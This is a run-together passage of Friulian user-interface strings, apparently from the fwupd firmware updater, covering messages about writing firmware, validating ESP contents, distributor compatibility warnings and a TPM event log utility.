hardware a identificâ subite i inzornaments bogns e falimentârs sui dispositîfs reâi.Dopre variabilis/flags di soluzions alternativis cuant che si instale il firmwareNon utentDaûr a convalidâ i contignûts ESP…Daûr a verificâ…VersionVersion[fwupd]In spiete…Scrîf il firmware dal file intal dispositîfScrîf il firmware dal file intune partizionDaûr a scrivi il file:Daûr a scrivi…Il to distributôr al podarès no vê verificât nissun dai inzornaments firmware pe compatibilitât cui dispositîfs tacâts o cul to sisteme.GUIDFirme i dâts doprant il certificât dal clientUtilitât di regjistrazion events TPM di fwupdplugins di fwupd